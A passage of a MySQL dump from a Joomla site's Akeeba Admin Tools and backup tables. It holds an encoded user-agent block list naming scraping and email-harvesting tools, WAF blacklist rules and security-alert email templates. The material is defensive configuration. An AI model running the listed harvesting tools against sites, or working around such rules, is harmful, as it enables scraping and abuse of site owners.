JiZXIiLCJFbWFpbENvbGxlY3RvciIsIkVtYWlsU2lwaG9uIiwiRW1haWxXb2xmIiwiRXhwcmVzcyBXZWJQaWN0dXJlcyIsImV4dHJhY3QiLCJFeHRyYWN0b3JQcm8iLCJFeWVOZXRJRSIsImZlZWRmaW5kZXIiLCJGSHNjYW4iLCJGbGFzaEdldCIsImZsaWNreSIsIkdldFJpZ2h0IiwiR2V0V2ViISIsIkdvLUFoZWFkLUdvdC1JdCIsIkdvIVppbGxhIiwiZ3JhYiIsIkdyYWJOZXQiLCJHcmFmdWxhIiwiaGFydmVzdCIsIkhNVmlldyIsImlhX2FyY2hpdmVyIiwiSW1hZ2UgU3RyaXBwZXIiLCJJbWFnZSBTdWNrZXIiLCJJbnRlckdFVCIsIkludGVybmV0IE5pbmphIiwiSW50ZXJuZXRTZWVyLmNvbSIsImpha2FydGEiLCJKYXZhIiwiSmV0Q2FyIiwiSk9DIFdlYiBTcGlkZXIiLCJrbWNjcmV3IiwibGFyYmluIiwiTGVlY2hGVFAiLCJsaWJ3d3ciLCJNYXNzIERvd25sb2FkZXIiLCJNYXh0aG9uJCIsIm1pY3Jvc29mdC51cmwiLCJNSURvd24gdG9vbCIsIm1pbmVyIiwiTWlzdGVyIFBpWCIsIk5FV1QiLCJNU0Zyb250UGFnZSIsIk5hdnJvYWQiLCJOZWFyU2l0ZSIsIk5ldCBWYW1waXJlIiwiTmV0QW50cyIsIk5ldFNwaWRlciIsIk5ldFpJUCIsIm51dGNoIiwiT2N0b3B1cyIsIk9mZmxpbmUgRXhwbG9yZXIiLCJPZmZsaW5lIE5hdmlnYXRvciIsIlBhZ2VHcmFiYmVyIiwiUGFwYSBGb3RvIiwicGF2dWsiLCJwY0Jyb3dzZXIiLCJQZW9wbGVQYWwiLCJwbGFuZXR3b3JrIiwicHNib3QiLCJwdXJlYm90IiwicHljdXJsIiwiUmVhbERvd25sb2FkIiwiUmVHZXQiLCJSaXBwZXJzIDAiLCJTZWFNb25rZXkkIiwic2l0ZWNoZWNrLmludGVybmV0c2Vlci5jb20iLCJTaXRlU25hZ2dlciIsInNreWdyaWQiLCJTbWFydERvd25sb2FkIiwic3Vja2VyIiwiU3VwZXJCb3QiLCJTdXBlckhUVFAiLCJTdXJmYm90IiwidEFrZU91dCIsIlRlbGVwb3J0IFBybyIsIlRvYXRhIGRyYWdvc3RlYSBtZWEgcGVudHJ1IGRpYXZvbGEiLCJ0dXJuaXQiLCJ2aWtzcGlkZXIiLCJWb2lkRVlFIiwiV2ViIEltYWdlIENvbGxlY3RvciIsIldlYiBTdWNrZXIiLCJXZWJBdXRvIiwiV2ViQ29waWVyIiwiV2ViRmV0Y2giLCJXZWJHbyBJUyIsIldlYkxlYWNoZXIiLCJXZWJSZWFwZXIiLCJXZWJTYXVnZXIiLCJXZWJzaXRlIGVYdHJhY3RvciIsIldlYnNpdGUgUXVlc3RlciIsIldlYlN0cmlwcGVyIiwiV2ViV2hhY2tlciIsIldlYlpJUCIsIldpZG93IiwiV1dXLU1lY2hhbml6ZSIsIldXV09GRkxFIiwiWGFsZG9uIFdlYlNwaWRlciIsIllhbmRleCIsIlpldXMiLCJ6bWV1IiwiQ2F6b29kbGVCb3QiLCJkaXNjb2JvdCIsImVjeGkiLCJHVDo6V1dXIiwiaGVyaXRyaXgiLCJIVFRQOjpMaXRlIiwiSFRUcmFjayIsImlhX2FyY2hpdmVyIiwiaWQtc2VhcmNoIiwiaWQtc2VhcmNoLm9yZyIsIklEQm90IiwiSW5keSBMaWJyYXJ5IiwiSVJMYm90IiwiSVNDIFN5c3RlbXMgaVJjIFNlYXJjaCAyLjEiLCJMaW5rc01hbmFnZXIuY29tX2JvdCIsImxpbmt3YWxrZXIiLCJsd3AtdHJpdmlhbCIsIk1GQ19UZWFyX1NhbXBsZSIsIk1pY3Jvc29mdCBVUkwgQ29udHJvbCIsIk1pc3NpZ3VhIExvY2F0b3IiLCJwYW5zY2llbnQuY29tIiwiUEVDTDo6SFRUUCIsIlBIUENyYXdsIiwiUGxlYXNlQ3Jhd2wiLCJTQklkZXIiLCJTbm9vcHkiLCJTdGVlbGVyIiwiVVJJOjpGZXRjaCIsInVybGxpYiIsIldlYiBTdWNrZXIiLCJ3ZWJhbHRhIiwiV2ViQ29sbGFnZSIsIldlbGxzIFNlYXJjaCBJSSIsIldFUCBTZWFyY2giLCJ6ZXJtZWxvIiwiWnlCb3JnIiwiSW5keSBMaWJyYXJ5IiwibGlid3d3LXBlcmwiLCJHbyFaaWxsYSIsIlR1cm5pdGluQm90Il0sImJhY2tlbmRwcm90IjoxLCJmcm9udGVuZHByb3QiOjEsImJlcGV4ZGlycyI6WyJjb21wb25lbnRzIiwibW9kdWxlcyIsInRlbXBsYXRlcyIsImltYWdlcyIsInBsdWdpbnMiXSwiYmVwZXh0eXBlcyI6WyJqcGUiLCJqcGciLCJqcGVnIiwianAyIiwianBlMiIsInBuZyIsImdpZiIsImJtcCIsImNzcyIsImpzIiwic3dmIiwiaHRtbCIsIm1wZyIsIm1wMyIsIm1wZWciLCJtcDQiLCJhdmkiLCJ3YXYiLCJvZ2ciLCJvZ3YiLCJ4bHMiLCJ4bHN4IiwiZG9jIiwiZG9jeCIsInBwdCIsInBwdHgiLCJ6aXAiLCJyYXIiLCJwZGYiLCJ4cHMiLCJ0eHQiLCI3eiIsInN2ZyIsIm9kdCIsIm9kcyIsIm9kcCIsImZsdiIsIm1vdiIsImh0bSIsInR0ZiIsIndvZmYiLCJ3b2ZmMiIsImVvdCIsIkpQRyIsIkpQRUciLCJQTkciLCJHSUYiLCJDU1MiLCJKUyIsIlRURiIsIldPRkYiLCJXT0ZGMiIsIkVPVCJdLCJmZXBleGRpcnMiOlsiY29tcG9uZW50cyIsIm1vZHVsZXMiLCJ0ZW1wbGF0ZXMiLCJpbWFnZXMiLCJwbHVnaW5zIiwibWVkaWEiLCJsaWJyYXJpZXMiLCJtZWRpYVwvanVpXC9mb250cyJdLCJmZXBleHR5cGVzIjpbImpwZSIsImpwZyIsImpwZWciLCJqcDIiLCJqcGUyIiwicG5nIiwiZ2lmIiwiYm1wIiwiY3NzIiwianMiLCJzd2YiLCJodG1sIiwibXBnIiwibXAzIiwibXBlZyIsIm1wNCIsImF2aSIsIndhdiIsIm9nZyIsIm9ndiIsInhscyIsInhsc3giLCJkb2MiLCJkb2N4IiwicHB0IiwicHB0eCIsInppcCIsInJhciIsInBkZiIsInhwcyIsInR4dCIsIjd6Iiwic3ZnIiwib2R0Iiwib2RzIiwib2RwIiwiZmx2IiwibW92IiwiaWNvIiwiaHRtIiwidHRmIiwid29mZiIsIndvZmYyIiwiZW90IiwiSlBHIiwiSlBFRyIsIlBORyIsIkdJRiIsIkNTUyIsIkpTIiwiVFRGIiwiV09GRiIsIldPRkYyIiwiRU9UIl0sImZ1bGxhY2Nlc3NkaXJzIjpbXX0=\",\"selfprotect\":\"1\",\"phpshield\":\"1\",\"nonewfrontendadmins\":\"1\",\"configmonitor_global\":\"1\",\"configmonitor_components\":\"1\",\"configmonitor_action\":\"email\",\"criticalfiles\":\"0\",\"superuserslist\":\"1\",\"disabled_superuserslist\":1,\"leakedpwd\":\"0\",\"criticalfiles_global\":\"\",\"consolewarn\":\"1\",\"filteremailregistration\":\"block\",\"404shield_enable\":\"1\",\"404shield\":\"wp-admin.php\\r\\nwp-login.php\\r\\nwp-content\\/*\\r\\nwp-admin\\/*\",\"emailphpexceptions\":\"\",\"logfile\":\"0\"}'),('fixperms_stack','{\"folders\":[],\"files\":[],\"total\":0,\"done\":0}'),('superuserslist','[\"309\",\"310\"]');
/*!40000 ALTER TABLE `vzx9b_admintools_storage` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_wafblacklists`
--
DROP TABLE IF EXISTS `vzx9b_admintools_wafblacklists`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_wafblacklists` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`option` varchar(255) NOT NULL,
`view` varchar(255) NOT NULL,
`task` varchar(255) NOT NULL,
`query` varchar(255) NOT NULL,
`query_type` varchar(1) NOT NULL,
`query_content` varchar(255) NOT NULL,
`verb` varchar(6) NOT NULL,
`application` enum('site','admin','both') NOT NULL DEFAULT 'site',
`enabled` tinyint(3) NOT NULL DEFAULT 1,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_wafblacklists`
--
LOCK TABLES `vzx9b_admintools_wafblacklists` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_wafblacklists` DISABLE KEYS */;
INSERT INTO `vzx9b_admintools_wafblacklists` VALUES (1,'','','','list[select]','E','!#^[\\p{L}\\d,\\s]+$#iu','','site',1),(2,'com_users','','','user[groups]','P','','','site',1);
/*!40000 ALTER TABLE `vzx9b_admintools_wafblacklists` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_wafexceptions`
--
DROP TABLE IF EXISTS `vzx9b_admintools_wafexceptions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_wafexceptions` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`option` varchar(255) DEFAULT NULL,
`view` varchar(255) DEFAULT NULL,
`query` varchar(255) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_wafexceptions`
--
LOCK TABLES `vzx9b_admintools_wafexceptions` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_wafexceptions` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_admintools_wafexceptions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_waftemplates`
--
DROP TABLE IF EXISTS `vzx9b_admintools_waftemplates`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_waftemplates` (
`admintools_waftemplate_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`reason` varchar(255) NOT NULL,
`language` varchar(10) NOT NULL DEFAULT '*',
`subject` varchar(255) NOT NULL,
`template` mediumtext NOT NULL,
`enabled` tinyint(3) NOT NULL DEFAULT 1,
`email_num` tinyint(3) unsigned NOT NULL,
`email_numfreq` tinyint(3) unsigned NOT NULL,
`email_freq` enum('','second','minute','hour','day') NOT NULL DEFAULT '',
`created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` bigint(20) NOT NULL DEFAULT 0,
`modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`admintools_waftemplate_id`),
UNIQUE KEY `vzx9b_admintools_waftemplate_keylang` (`reason`(100),`language`)
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_waftemplates`
--
LOCK TABLES `vzx9b_admintools_waftemplates` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_waftemplates` DISABLE KEYS */;
INSERT INTO `vzx9b_admintools_waftemplates` VALUES (1,'all','*','Security exception on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p>Hello,</p>\r\n<p>We would like to notify you that a security exception was detected on your site, [SITENAME], with the following details:</p>\r\n<p>IP Address: [IP] (IP Lookup: [LOOKUP])<br />Reason: [REASON]</p>\r\n<p>If this kind of security exception repeats itself, please log in to your site\'s back-end and add this IP address to your Admin Tools\'s Web Application Firewall feature in order to completely block the misbehaving user.</p>\r\n<p>Best regards,</p>\r\n<p>The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,5,1,'hour','2014-04-14 14:36:34',800,'2014-04-14 14:42:38',800),(2,'user-reactivate','*','User deactivated on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p>Hello,</p>\r\n<p>on [DATE] the user account [USER] was de-activated because too many failed logins were detected coming from IP address: [IP].</p>\r\n<p>Please click on the following link to activate the user account again:<br />[ACTIVATE]</p>\r\n<p>Best regards,</p>\r\n<p>The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,0,0,'','2014-04-24 14:44:49',800,'0000-00-00 00:00:00',0),(3,'adminloginfail','*','Failed administrator login for user [USER] on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p>Hello,</p>\r\n<p>We would like to notify you that user <strong>[USER]</strong> did <strong>not</strong> log in successfully to the administrator back-end area of your site, [SITENAME]. <span style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Further information:</span></p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Username: [USER]<br />IP address: [IP] ([LOOKUP])<br />Country*: [COUNTRY]<br />Continent*: [CONTINENT]<br />Browser User Agent string: [UA]</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">* Country and continent information availability and accuracy depend on the GeoIP database installed on your site.</p>\r\n<p>If this expected you need to do nothing about it. If you suspect a hacking attempt, please log in to your site\'s back-end immediately and activate Admin Tools\' Emergency Off-Line mode at once.</p>\r\n<p>Best regards,</p>\r\n<p>The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,5,1,'hour','2015-07-27 13:52:45',800,'2015-07-27 13:58:31',800),(4,'adminloginsuccess','*','User [USER] logged in on [SITENAME] administrator area','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Hello,</p>\r\n<p>We would like to notify you that user [USER] has just logged in to the administrator back-end area of your site, [SITENAME]. Further information:</p>\r\n<p>Username: [USER]<br />IP address: [IP] ([LOOKUP])<br />Country*: [COUNTRY]<br />Continent*: [CONTINENT]<br />Browser User Agent string: [UA]</p>\r\n<p>* Country and continent information availability and accuracy depend on the GeoIP database installed on your site.</p>\r\n<p>If this expected you need to do nothing about it. If you suspect a hacking attempt, please log in to your site\'s back-end immediately and activate Admin Tools\' Emergency Off-Line mode at once.</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Best regards,</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,5,1,'hour','2015-07-27 13:58:08',800,'0000-00-00 00:00:00',0),(5,'ipautoban','*','Automatic IP blocking notification for [IP] on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Hello,</p>\r\n<p>We would like to notify you that the IP address [IP] is now blocked from accessing your site, [SITENAME]<span style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">, with the following details:</span></p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">IP Address: [IP] (IP Lookup: [LOOKUP])<br />Reason: [REASON]<br />Banned until: [UNTIL]</p>\r\n<p>If this is your own IP address and you can no longer access your site please <a href=\"http://akee.ba/lockedout\">follow our instructions</a> to temporarily disable Admin Tools\' Web Application Firewall and clear the automatic IP ban.</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Best regards,</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,5,1,'hour','2015-07-27 14:20:00',800,'0000-00-00 00:00:00',0),(6,'configmonitor','*','Configuration options for [AREA] modified on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\n<p>Hello,</p>\n<p>We would like to notify you that the configuration options for [AREA] on your site, [SITENAME], have been modified by user [USER]. More details about the origin of this change as follows:</p>\n<p>IP Address: [IP] (IP Lookup: [LOOKUP])<br />User Agent: [UA]</p>\n<p>If this change was not made by you or an administrator user you trust please review your site immediately as this would be an indication of hacking activity.</p>\n<p>Best regards,</p>\n<p>The [SITENAME] team</p>\n</div>\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you have a subscription in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\n</div>',1,0,0,'','2016-12-15 10:46:00',800,'2016-12-15 10:46:00',800),(7,'superuserslist','*','Super Users were added to [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\n<p>Hello,</p>\n<p>\nWe would like to notify you that we detected the suspicious addition of one or more Super User accounts to your site, [SITENAME]. These new Super User accounts do not seem to have been created through the regular means, i.e. Joomla\'s “Users” page. Therefore they have been blocked. The new Super User accounts detected <strong>and blocked</strong> are:\n</p>\n[INFO]\n<p>\n<h3>Do I need to worry?</h3>\n<p>\nSuper User accounts have full access to your site. They can modify all content, without any restriction. They can also install software which can access or modify every aspect of your site, including arbitrary files, database content and configuration settings. Only grant Super User access to people you trust.\n</p>\n<p>\nIf you are receiving this email it means that these Super User accounts were created outside Joomla\'s “Users” page. Typically this means that a hacker found a way to bypass your site\'s or your server\'s security and tried to surreptitiously create Super User accounts for themselves. For this reason these accounts were blocked, i.e. they cannot be used to log into your site.\n</p>\n<p>\nIt is possible, however, that you do receive this email in error: if you or another Super User did intend to create these Super User accounts and used a third party tool to do that. If this is the case then do not worry. Just log in to your site\'s administrator backend with your own Super User account, go to the Users page, edit the users listed further above in this email and unblock them.\n</p>\n<p>\nIf you or another Super User did NOT intend to create these Super Users we recommend auditing your site and your server for any other signs of anomalous activity.\n</p>\n<p>Best regards,</p>\n<p>The [SITENAME] team</p>\n</div>\n</div>',1,0,0,'','2017-04-06 09:50:00',800,'2017-04-06 09:50:00',800),(8,'rescueurl','*','Rescue URL requested on [SITENAME] for [USER]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\n<p>Hello,</p>\n<p>We would like to notify you that user [USER] has requested a Rescue URL for your site, [SITENAME]. If you made that request yourself please click on the following link, or copy and paste the URL to your browser. This will let you log in to the administrator backend of your site where you can modify unblock yourself and / or change Admin Tools\' configuration. The Rescue URL is:</p>\n<p><a href=\"[RESCUEURL]\" rel=\"alternate\">[RESCUEURL]</a></p>\n<p>The information towards the end of this email lets you know what to do once you are logged into your site\'s backend.</p>\n<h3>I have no idea why I\'m receiving this email</h3>\n<p>Look under \"What is the Rescue URL\" further down. You <strong>DO NOT</strong> need to take any action and you <strong>DO NOT</strong> need to worry.</p>\n<h3>Who requested the Rescue URL?</h3>\n<p>Username: [USER]<br />IP Address: <a href=\"[LOOKUP]\" rel=\"alternate\">[IP]<br /></a>Country: [COUNTRY]<br />Continent: [CONTINENT]<br />User Agent: [UA]</p>\n<p> </p>\n<h3>What is the Rescue URL?</h3>\n<p>Sometimes an overzealous Admin Tools configuration can result in accidentally blocking you, a Super User from the site. Normally that would require you to rename the file of Admin Tools\' system plugin to unblock yourself. This is a bit complicated and susceptible to errors.</p>\n<p>The Rescue URL feature works around that. By accessing a special URL when you are blocked out of the site you are sent this email. The URL in this email is only valid for the same browser and IP address that made the request and only for a limited amount of time. Accessing it will get you to a <em>temporarily</em> unblocked administrator login page. This lets you access the administrator backend of your site to unblock yourself and / or modify Admin Tools settings.</p>\n<p>By default, this feature is enabled on all installations of Admin Tools. Moreover, a message about accessing the Rescue URL is displayed by default when someone gets blocked UNLESS you set up a \"Custom message\" in the Configure WAF page of Admin Tools. If you have no idea why you received this message it\'s probably because someone saw the default IP blocked message and guessed your Super User email correctly. Don\'t worry though, what they did is completely useless since they would also need access to your email account and your Super User password to access your site, i.e. they would need to have already hacked you. As it\'s already documented, we strongly recommend that you change the \"Custom message\" to make it less obvious that your site is protected by Admin Tools. If you do not wish to use the Rescue URL feature -and are OK manually renaming files per the documentation when you get blocked- go to Extensions, Plugins and edit the options of the Admin Tools system plugin. You\'ll see an option for Rescue URL. Set it to No to disable this feature.</p>\n<h3>What to do after logging in?</h3>\n<p>If your IP is blocked by Admin Tools go to Components, Admin Tools and click the big Unblock My IP button at the top of the page.</p>\n<p>If you keep getting your IP blocked without you doing anything suspicious to the best of your knowledge, the IP blocked is always the same but different than the one reported by <a href=\"http://www.ip-adress.eu/\">http://www.ip-adress.eu/ </a><em>and</em> <a href=\"https://www.whatismyip.com/\">https://www.whatismyip.com/</a> then your site might be behind a CDN or a reverse proxy. In this case, additionally to the instructions above, please go to Components, Admin Tools, Web Application Firewall, Configure WAF, click on the Basic Protection Features tab. Set the \"Enable IP workarounds\" option to Yes - no matter what the automatically detected recommendation is.</p>\n<p>If, however, your real IP address as reported by the two tool listed above keeps getting banned you should troubleshoot the reason of the ban. Go to Components, Admin Tools, Web Application Firewall, Security Exceptions Log and check the Reason and Target URL for the entries which have your IP address in the IP address field. If you are not sure what that means, please <a href=\"https://www.akeebabackup.com/support/admin-tools.html\" rel=\"alternate\">file a support ticket</a> remembering to copy the information from the Security Exceptions Log. Kindly note that you need to have an active subscription to receive support.</p>\n<p>If you have forgotten your Administrator Secret URL parameter go to Components, Admin Tools, Web Application Firewall, Configure WAF, click on the Basic Protection Features tab and find the \"Administrator secret URL parameter\" option. Change or remove all of the text in that box to reset or unset, respectively, this feature.</p>\n<h3>What to do if I still cannot log in to my site?</h3>\n<p>There are two cases where the Rescue URL feature, or renaming the Admin Tools system plugin\'s file, will not help you. These are the two cases where Admin Tools has created a <em>server</em> configuration file, meaning that you are blocked by <em>your server</em>, not Admin Tools.</p>\n<p>The first is the <strong>Administrator password protection</strong> feature. Please delete the files named <code>.htaccess</code> and <code>.htpasswd</code> from your site\'s <code>administrator</code> directory. </p>\n<p>The other case is when you\'ve used the <strong>.htaccess Maker</strong> feature of Admin Tools. In this case there\'s a <code>.htaccess</code> file in your site\'s root. You may want to replace its contents with the <a href=\"https://raw.githubusercontent.com/joomla/joomla-cms/staging/htaccess.txt\" rel=\"alternate\">default Joomla! .htaccess file content</a>.</p>\n<p>In both cases you should not that the files have names beginning with a dot. That makes them <em>hidden</em>. You will need to enable the display of hidden files to edit / delete those files. If you are unsure how to do that please ask your host and tell them that you need to edit/delete <em>hidden</em> files. Usually they will point out an option in their hosting control panel\'s file manager. </p>\n<p>In any other case your issue is unrelated to Admin Tools. Do you have another security plugin on your site? If you do, check its settings. If not, check with your host. More often than not hosts have their own server security systems which can block you out of your site.</p>\n</div>\n</div>',1,1,1,'minute','2017-06-20 09:50:00',800,'2017-06-20 09:50:00',800),(9,'criticalfiles','*','Critical file modified on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\n<p>Hello,</p>\n<p>We would like to notify you that one or more critical files have been modified on your site, [SITENAME]. The list of files modified on your site is as follows:</p>\n[INFO]\n<h3>Should I be worried?</h3>\n<p>Critical files, in the context of this email, are the files most usually targeted by hackers upon successful hacking of a site. These files can also be modified for legitimate reasons, for example when you save your site\'s Global Configuration or when you update Joomla! or one of its templates.</p>\n<p>You should NOT worry if you received this email after you, or another administrator you trust, performed any of the following changes on your site:</p>\n<ul>\n <li>Restored the site from a backup</li>\n <li>Modified the Global Configuration</li>\n <li>Updated Joomla!</li>\n <li>Updated a site template</li>\n</ul>\n<p>If this message was not sent to you as the result of such a desirable and expected change please review your site immediately as this would be an indication of hacking activity.</p>\n<p>Best regards,</p>\n<p>The [SITENAME] team</p>\n</div>\n</div>',1,0,0,'','2017-04-05 13:15:00',800,'2017-04-05 13:15:00',800),(10,'criticalfiles_global','*','Critical file modified on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\n<p>Hello,</p>\n<p>We would like to notify you that one or more critical files that you decided to monitor have been modified on your site, [SITENAME]. The list of files modified on your site is as follows:</p>\n[INFO]\n<p>If this message was not sent to you as the result of such a desirable and expected change please review your site immediately as this would be an indication of hacking activity.</p>\n<p>Best regards,</p>\n<p>The [SITENAME] team</p>\n</div>\n</div>',1,0,0,'','2017-04-05 13:15:00',800,'2017-04-05 13:15:00',800);
/*!40000 ALTER TABLE `vzx9b_admintools_waftemplates` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_ak_profiles`
--
DROP TABLE IF EXISTS `vzx9b_ak_profiles`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_ak_profiles` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`description` varchar(255) NOT NULL,
`configuration` longtext DEFAULT NULL,
`filters` longtext DEFAULT NULL,
`quickicon` tinyint(3) NOT NULL DEFAULT 1,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_ak_profiles`
--
LOCK TABLES `vzx9b_ak_profiles` WRITE;
/*!40000 ALTER TABLE `vzx9b_ak_profiles` DISABLE KEYS */;
